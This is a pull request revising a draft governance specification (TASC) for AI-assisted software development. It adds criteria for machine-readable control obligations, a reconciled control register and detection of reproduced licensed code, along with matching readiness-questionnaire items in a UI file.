+the cross-tenant case, mechanical discharge of attribution obligations that
+survive inlining, and the sources admitted to context recorded as generation
+lineage. AC3.1 carries the matching threat class, AC9.3 now states its own
+limit, and AC9.1 carries the vendor's filtering and indemnity posture — which
+is a subservice control and never the entity's own.*
+
+*Changes in 0.5.0 from 0.4.0, drawn from published accounts of
 operating an AI-native SDLC at scale: AC3.6 draws agent boundaries around access
 and actions rather than instructions, and counts an agent's reachable peers as
 part of its effective authority — a constrained agent asking a peer to act for
@@ -970,7 +1095,10 @@ Human Control (§9). The 0.1 file name is retained so existing references and
 ingestion records stay valid.*
 
 *Known open items: outcome-vocabulary finalization (AC2.2); ISO 27001 and SSDF
-crosswalk annexes; trademark diligence on the name; governance venue. By design
+crosswalk annexes; a non-normative schema for declared control obligations
+(AC5.8), deliberately unspecified here so the criterion does not bind an entity
+to one policy-as-code dialect; trademark diligence on the name; governance
+venue. By design
 rather than omission, the specification fixes no numbers: coverage floors (SI2),
 false-positive tolerances (AC4.6), advisory-control violation tolerances
 (AC5.7), qualification run counts and thresholds (AC8.3), and SLOs (SI8) are all

--- a/spec/tasc-0.1-draft.md
+++ b/spec/tasc-0.1-draft.md
@@ -889,12 +889,16 @@ focus (non-authoritative guidance).
   from public corpora, from repositories and documents fetched into context
   (AC3.2), and from source belonging to another client, tenant, or engagement.
   Where a match is identified, the change MUST NOT merge until the source's
-  license is identified and permitted (AC9.3) and every obligation it carries is
+  license is identified and admitted, and every obligation it carries is
   discharged **mechanically** — notice and attribution retention, license-text
-  inclusion, copyleft assessment — or the code is regenerated. Attribution
-  obligations survive inlining: a permissive license on the allowlist is a
-  permission with conditions, not an absence of conditions, and a notice file
-  assembled by hand is a control nobody has measured.
+  inclusion, copyleft assessment — or the code is regenerated. Admission is
+  decided by **this criterion's gate**, against the same license allowlist the
+  entity maintains for AC9.3: the permitted-license policy is one policy, but
+  reproduced source has no dependency record for AC9.3's gate to act on, so
+  routing the decision there would apply a control to an artifact outside its
+  boundary. Attribution obligations survive inlining: a permissive license on
+  the allowlist is a permission with conditions, not an absence of conditions,
+  and a notice file assembled by hand is a control nobody has measured.
   The **permissible-source boundary MUST be declared and mechanically enforced**
   rather than left to instruction (P4): which repositories, corpora, and
   engagement contexts an agent may draw from, and which it MUST NOT. The
@@ -1017,11 +1021,13 @@ system descriptions; no specific product confers conformance.
 12. Evaluation-suite statement (AC8.7): representativeness review date,
     contamination controls, retired tasks; and the capability-baseline history
     with any detected drift and its attribution (AC4.9)
-13. Control register (AC5.9): declared obligations (AC5.8) with enforcement tier,
-    measuring mechanism and its independence basis, last exercised evidence and
-    freshness, advisory adherence against declared tolerance, and the
-    reconciliation result — obligations without enforcement points, and
-    enforcement points without declared obligations
+13. Control register (AC5.9): declared obligations (AC5.8) with enforcement
+    tier; every enforcement point, on every surface and for every agent in the
+    staff roster, with its authoritative status; measuring mechanism and its
+    independence basis; last exercised evidence and freshness; advisory
+    adherence against declared tolerance; the accountable party per obligation
+    (AC1.7); and the reconciliation result — obligations without enforcement
+    points, and enforcement points without declared obligations
 
 ---
 

--- a/src/core/upstream-evidence-manifest.ts
+++ b/src/core/upstream-evidence-manifest.ts
@@ -2101,7 +2101,7 @@ export const UPSTREAM_EVIDENCE_MANIFEST: Readonly<Record<string, string>> =
     "ui/README.md":
       "deeb35e767ea5dd2883268835ea3ad21cbad9fa63ec8d8ff5e200f0e2a7d2751",
     "ui/index.html":
-      "2d96d36ddf2f973a714d91c3f734aa49fa50415883702e1895f747d8e2e689c2",
+      "7d812e74ce22a68325012561f14ff5c9a9f3f9aebd87a1ceff945e36ac5fd916",
   });
 
 /** Exact paths tracked by the public Lisa repository at generation time. */

--- a/src/core/upstream-evidence-manifest.ts
+++ b/src/core/upstream-evidence-manifest.ts
@@ -2101,7 +2101,7 @@ export const UPSTREAM_EVIDENCE_MANIFEST: Readonly<Record<string, string>> =
     "ui/README.md":
       "deeb35e767ea5dd2883268835ea3ad21cbad9fa63ec8d8ff5e200f0e2a7d2751",
     "ui/index.html":
-      "7d812e74ce22a68325012561f14ff5c9a9f3f9aebd87a1ceff945e36ac5fd916",
+      "400088617ed6f16b4e52da5bfa81242d75cb09bc3ad6929eadb9f06e5365b4b6",
   });
 
 /** Exact paths tracked by the public Lisa repository at generation time. */

--- a/ui/index.html
+++ b/ui/index.html
@@ -5754,6 +5754,13 @@
                       "Isolation is per-repo by convention",
                       "No declared boundary",
                     ],
+                    via: [
+                      "Per-engagement workspace isolation",
+                      "Sandbox / container scoping",
+                      "Repository allowlist",
+                      "Context provenance log",
+                      "None",
+                    ],
                   },
                   {
                     q: "Can an agent add a new dependency unreviewed?",
@@ -6109,6 +6116,13 @@
                       "A register exists, maintained by hand",
                       "It's spread across CI config, branch rules and instruction files",
                       "No — we would have to go and look",
+                    ],
+                    via: [
+                      "Generated from policy-as-code",
+                      "Compliance platform",
+                      "In-house control dashboard",
+                      "Spreadsheet",
+                      "None",
                     ],
                   },
                   {

--- a/ui/index.html
+++ b/ui/index.html
@@ -5688,6 +5688,25 @@
                     ],
                     viaValue: "license-checker",
                   },
+                  {
+                    q: "What catches licensed or proprietary code reproduced directly into your source?",
+                    help: "TASC SI10. The allowlist above governs declared dependencies — code a model reproduces from memory, or an agent copies out of a repository it fetched while researching, carries no lockfile entry and no SBOM line, so every scanner above is blind to it. This gate detects verbatim and near-verbatim reuse and holds the merge until the source's license is identified and its obligations discharged. Attribution survives inlining: a permissive license on the allowlist is a permission with conditions, not an absence of them, and a notice file assembled by hand is a control nobody has measured.",
+                    kind: "select",
+                    options: [
+                      "Similarity gate on changed code, with attribution notices generated mechanically",
+                      "Similarity scanning, attribution handled by hand",
+                      "We rely on the model vendor's filter",
+                      "Nothing — review would have to notice",
+                    ],
+                    via: [
+                      "SCANOSS",
+                      "FOSSA",
+                      "Black Duck",
+                      "ScanCode",
+                      "Vendor-side filter",
+                      "None",
+                    ],
+                  },
                 ],
               },
               {
@@ -5723,6 +5742,17 @@
                       "Allowlisted domains only",
                       "Scoped per factory",
                       "Anything",
+                    ],
+                  },
+                  {
+                    q: "Which codebases may an agent draw from — and what stops one client's source reaching another's?",
+                    help: "TASC SI10. Reading the web is an injection surface; reading source is a licensing and confidentiality one. The permissible-source boundary — which repositories, corpora and engagement contexts an agent may draw from — has to be enforced by mechanism rather than instruction, because an instruction not to reuse another client's code is a rule with an unmeasured breach rate (AC5.7). Persisted memory and learnings carry source across that boundary exactly as context does, and the harm here is contractual rather than reputational.",
+                    kind: "select",
+                    options: [
+                      "Declared boundary, enforced mechanically, sources recorded per change",
+                      "Declared boundary, enforced by instruction",
+                      "Isolation is per-repo by convention",
+                      "No declared boundary",
                     ],
                   },
                   {
@@ -5966,7 +5996,7 @@
                 ],
               },
               {
-                label: "Review & merge (AC8.1 · AC5 · AC5.7 · AC8.8)",
+                label: "Review & merge (AC8.1 · AC5 · AC5.7–AC5.9 · AC8.8)",
                 items: [
                   {
                     q: "What reviews every diff before merge?",
@@ -6050,6 +6080,35 @@
                       "Inventoried, breach rate measured, over-tolerance rules promoted to gates",
                       "Inventoried, adherence not measured",
                       "We assume the instructions are followed",
+                    ],
+                  },
+                  {
+                    q: "Where do your control obligations live — and do the gates come from there?",
+                    help: "TASC AC5.8. A rule transcribed into a CI config, a lint rule and an instruction file has three sources of truth and therefore none, and nothing can detect drift between them. Each obligation should be one versioned, machine-readable artifact naming its enforcement tier and the independent mechanism that measures it — a coverage floor that doesn't say which system computes coverage has declared an intention, not a control — with every enforcement point and every agent-facing rendering generated from it.",
+                    kind: "select",
+                    options: [
+                      "Declared as machine-readable artifacts, with enforcement points and agent context generated from them",
+                      "Machine-readable, but each enforcement point is configured separately",
+                      "Written as prose policy documents",
+                      "Only as whatever each tool happens to be configured to do",
+                    ],
+                    via: [
+                      "Policy-as-code in the repo",
+                      "OPA / Rego",
+                      "Generated CI configuration",
+                      "In-house policy engine",
+                      "None",
+                    ],
+                  },
+                  {
+                    q: "Can you enumerate every control, where it is enforced, and when it last fired?",
+                    help: "TASC AC5.9 — the first question an attestor asks, and the one a factory with its control configuration scattered across a pipeline cannot answer. The register carries each obligation's enforcement tier, its measuring mechanism, its last exercised evidence and freshness, measured adherence for the advisory ones, and who answers for it. It has to reconcile both ways against the running system: an obligation with no enforcement point and an enforcement point with no declared obligation are each findings. Unreconciled, a register records what you believe you enforce, and the gap from what you actually enforce is invisible in the direction that matters.",
+                    kind: "select",
+                    options: [
+                      "Live register, reconciled both ways against the running system",
+                      "A register exists, maintained by hand",
+                      "It's spread across CI config, branch rules and instruction files",
+                      "No — we would have to go and look",
                     ],
                   },
                   {

--- a/wiki/concepts/tasc-specification.md
+++ b/wiki/concepts/tasc-specification.md
@@ -81,7 +81,7 @@ stack against it; (3) Lisa — open source, one conforming reference
 implementation and the fastest path to green. No layer requires another; see
 the [three-layer trust play decision](../decisions/2026-07-25-three-layer-trust-play.md).
 The Lisa console's readiness questionnaire is the working self-assessment
-instrument referenced by the spec's Annex B — 110 questions across 16 groups,
+instrument referenced by the spec's Annex B — 114 questions across 16 groups,
 each group citing the criteria it evidences.
 
 ## Revision 0.5.0 — agent boundaries and graduated autonomy


### PR DESCRIPTION
Closes #2128.

Revises the TASC draft from 0.5.0 to 0.6.0 with three new criteria, plus two unrelated carry-over commits (see below).

## Why

The specification described at length what controls must do without ever requiring an entity to be able to enumerate them. Separately, its only licensing criterion reached declared dependencies and nothing else.

## The criteria

**AC5.8 Declared control obligations.** Every control obligation exists as a versioned, machine-readable artifact stating its identifier, the requirement it serves, its enforcement tier (authoritative or advisory), its enforcement points, its parameters, and — critically — the measuring mechanism plus the basis of that mechanism's independence from the agents whose work it judges. Enforcement points and agent-facing renderings must be *derived* from that artifact rather than restated alongside it:

> An obligation separately transcribed into a pipeline configuration, a lint rule, and an instruction file has three sources of truth and therefore none, and AC5.2's drift detection has nothing to detect against.

AC5.2 had named a source of truth that nothing in the specification obliged anyone to have.

**AC5.9 Control register.** Every declared obligation across every surface and agent, carrying enforcement tier, measuring mechanism, last exercised evidence and freshness, measured adherence for advisory controls, and the accountable party. The load-bearing requirement is bidirectional reconciliation against the running system: an obligation with no enforcement point, and an enforcement point implementing no declared obligation, are each findings entering intake — the discipline AC3.1 applies to threats and controls. It also consolidates visibility requirements previously scattered across the gate inventory, AC5.7's advisory inventory, AC5.3 staff parity, and P9.

**SI10 Output provenance and licensing.** AC9.3 checks the licenses of *declared dependencies*; code a model reproduces from memory, or an agent copies from a repository fetched during research, carries no lockfile entry and no SBOM line. SI10 requires a reuse-detection gate on changed code, a declared and mechanically enforced permissible-source boundary (covering the cross-tenant case, and naming persisted memory as a carrier alongside context), mechanical discharge of attribution obligations that survive inlining, and sources admitted to context recorded as generation lineage under AC1.2. Consistency hooks: the detector is a finding source whose false-positive rate must be measured (AC4.6), the gate must be exercised on a seeded known match (P1, AC5.5), and inapplicability is explicitly not earnable.

## Supporting amendments

- **AC3.1** carries the matching threat class (reproduction of licensed or proprietary material).
- **AC9.3** now states its own limit, so it cannot be read as covering inlined code.
- **AC9.1** carries the model vendor's reproduction filtering, attribution facilities, and IP indemnity — explicitly as subservice controls that must not be reported as the entity's own.
- §6 gains the control register as a system-description item; Annexes A, C and D updated.

## Annex B instrument

Four questions added to the console readiness intake (110 → 114), in the groups where each belongs: the reuse-detection question sits directly after the existing license-allowlist question it limits, and the permissible-source question sits with the context-surface questions. All four are left unanswered — an unanswered question is a known gap, not a failure.

## Carry-over commits (unrelated)

At the user's explicit instruction, two unrelated working-tree changes ride along: accumulated `.lisa/` work-item artifacts from #1956–#1995, and removal of two explicit `false` plugin disables in `.claude/settings.json`. Both are called out as unrelated in their commit messages.

## Known follow-up

SI10 permits "or the code is regenerated" as a remedy, but AC8.1's regenerate-from-spec preference does not help when the same model reproduces the same memorized snippet from the same specification. A bounded-retry-then-escalate rule is needed and was deliberately not invented here.

Work-Item: CodySwannGT/lisa#2128

🤖 Generated with Claude Code


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **New Features**
  * Added readiness questionnaire checks for code provenance, permissible source boundaries, and control-obligation tracking.
  * Expanded review and merge coverage to include additional control requirements.

* **Documentation**
  * Added planning, research, security review, testing, and verification records for safety and workflow improvements.
  * Updated the TASC specification with control-register, licensing, and provenance requirements.
  * Corrected the documented questionnaire count from 110 to 114 items.

* **Chores**
  * Updated safety tooling configuration and refreshed evidence tracking.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->